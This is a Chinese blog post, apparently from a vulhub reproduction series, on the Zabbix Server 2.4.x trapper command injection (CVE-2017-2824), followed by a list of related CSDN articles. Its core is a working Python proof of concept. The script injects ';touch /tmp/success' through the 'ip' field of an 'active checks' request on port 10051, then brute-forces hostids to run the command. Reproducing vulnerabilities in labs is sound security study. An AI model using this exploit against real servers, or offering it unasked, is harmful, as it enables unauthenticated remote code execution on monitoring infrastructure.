Zabbix Server trapper命令注入漏洞(CVE-2017-2824)

最新推荐文章于 2024-05-07 18:12:37 发布
最新推荐文章于 2024-05-07 18:12:37 发布
阅读量980 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119840274
版权

漏洞简介

Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。远程攻击者可利用该漏洞注入命令,执行代码。

漏洞复现

使用这个简单的POC来复现漏洞:

import sys
import socket
import json
import sys


def send(ip, data):
    conn = socket.create_connection((ip, 10051), 10)
    conn.send(json.dumps(data).encode())
    data = conn.recv(2048)
    conn.close()
    return data


target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
for i in range(10000, 10500):
    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
    if data and b'failed' not in data:
        print('hostid: %d' % i)
        print(data)

这个POC比较初级,请多执行几次,当查看到如下结果时,则说明命令执行成功:

在这里插入图片描述
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
zabbix 安装配置
weixin_30648963的博客
12-31 41
zabbix的配置文件一般有三种:zabbixserver的配置文件zabbix_server.confzabbixproxy的配置文件zabbix_proxy.confzabbix_agentd的配置文件zabbix_agentd.conf===========================================1.zab...
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
做自己喜欢的事,并将其发挥到极致!
06-30 1337
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Servertrapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。...
zabbix监控方式(zabbix-trapper
最新发布
杜小帅的博客
05-07 432
中文:zabbix采集器,即zabbix senderZabbix-Trapper 监控方式可以一次批量发送数据给Zabbix Server,与主动模式不同,Zabbix-Trapper 可以让用户控制数据的发送,而不用Zabbix-Agent进程控制,这意味着可以使用Linux定时任务 , 或者 借助其他程序调用 Zabbix-Trapper 发送数据给 ZabbixServer。在 Zabbix-Trapper 工作模式中 , Zabbix 发送数据的程序是zabbix_sender
CVE-2017-2824 zabbix 命令注入漏洞(未授权访问/绕过登录)
qq_41567985的博客
09-27 548
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Servertrapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。命令执行后,执行docker-compose ps查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。总结一下: 其中那个多试几次就好,还有,超时时间改小一点,不要极端,不然很难反弹shell。---->可见-权限算太高。
Zabbix爆高危漏洞CVE-2017-2824
Listen2You的博客
05-10 4083
导读 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。   关于Zabbix zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1529
vulhub漏洞复现练习篇
Zabbix Server trapper两个命令注入漏洞CVE-2017-2824CVE-2020-11800)
黑白的博客
05-02 2143
声明 好好学习,天天向上 CVE-2017-2824 漏洞描述 Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Servertrapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。 影响范围 Zabbix 2.4.7 - 2.4.8r1 复现过程 这里使用3.0.3版本 使用vulhub /app/vulhub-m
php-proxy3 漏洞,Zabbix Server Active Proxy Trappe RCE 漏洞详解(CVE-2017-2824)
weixin_39663970的博客
04-12 503
前言有点相似Zabbix是一种企业监控解决方案,旨在使组织能够监控其网络中各种系统的健康状况和状态,包括:网络服务,服务器和网络设备。前些日子Lilith Wyatt of Cisco ASIG 发现利用命令注入的形式可以在Zabbix Server上实现远程代码执行,影响的版本为Zabbix 2.4.7 – 2.4.8r1。在复现过程中发现利用条件比较苛刻,首先需要能访问到Zabbix Serv...
zabbix-server-mysql-4.0.4-1.1.x86_64.rpm
03-19
zabbix-server-mysql-4.0.4-1.1.x86_64.rpm离线安装包,centos7的,
zabbix-server-pgsql-4.0.8-1.el7.x86_64.rpm
01-01
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
zabbix trapper方式监控
weixin_34250434的博客
02-05 746
   zabbix获取数据时有时会出现超时,如果一些数据需要执行比较长的时间才能获取的话,那么zabbix会出现异常,考虑到这种情况,zabbix增加了Trapper功能,客户端自己提交数据给zabbix。    trapper是被监控主机主动发送数据给zabbix server,与主动模式的区别是不需要安装客户端;trapper方式发送数据是以主机名处理,不是IP地址,所以主机名要唯一。在配置...
mysql漏洞2017_Zabbix爆高危漏洞CVE-2017-2824
weixin_39652658的博客
02-08 264
原标题:Zabbix爆高危漏洞CVE-2017-2824纯手工打造每一篇开源资讯与技术干货,数十万程序员和Linuxer已经关注。导读zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 关于Zabbixzabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保...
zabbix漏洞利用 Zabbix Server远程代码执行漏洞CVE-2017-2824 2.4.X均受影响
weixin_33849215的博客
09-01 1324
近日,Zabbix Server 2.4.X的trapper命令功能中被曝出存在可利用的代码执行漏洞CVE-2017-2824)。 一组特制的数据包可能导致命令注入,导致远程执行代码。 攻击者可以从活动的Zabbix Proxy发出请求以触发此漏洞。该漏洞位于Zabbix代码的“Trapper”部分,这是允许代理和服务器通信的网络服务(TCP端口100...
(30)zabbix Trapper 监控项配置
weixin_30371875的博客
05-08 202
概述 zabbix获取数据有超时时间,如果一些数据需要执行比较长的时间才能获取的话,那么zabbix会出现异常,考虑到这种情况,zabbix增加了Trapper功能,客户端自己提交数据给zabbix,这个通道便是trapper 使用trapper的步骤如下: 在zabbix中配置trapper监控项 传递数据到zabbix中 配置 配置监控项 Configuration(配置...
Zabbix5.0进程知识
全村的希望博客
08-16 940
Zabbix服务端进程被分为不同的种类,每一种进程负责相应的任务,包括收集原始监控数据、对原始监控数据进行预处理、将预处理后的监控数据同步到数据库、对监控数据进行计算以生成事件、计算和获取内部监控数据,以及对数据库中的数据进行清理等。...
dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent
05-29
这个命令是用来安装 Zabbix ServerZabbix Web、Nginx 配置文件、Zabbix SQL 脚本、SELinux 策略和 Zabbix Agent。这些组件都是 Zabbix 监控系统所必需的。 如果您已经安装了 Zabbix Server 和 MySQL,您可以使用此命令安装其他必需的组件。安装命令如下: ``` dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent ``` 安装完成后,您需要按照 Zabbix 官方文档中的说明来配置 Zabbix ServerZabbix Web。其中包括创建 Zabbix 数据库、导入 SQL 脚本、编辑 Zabbix Server 配置文件等步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值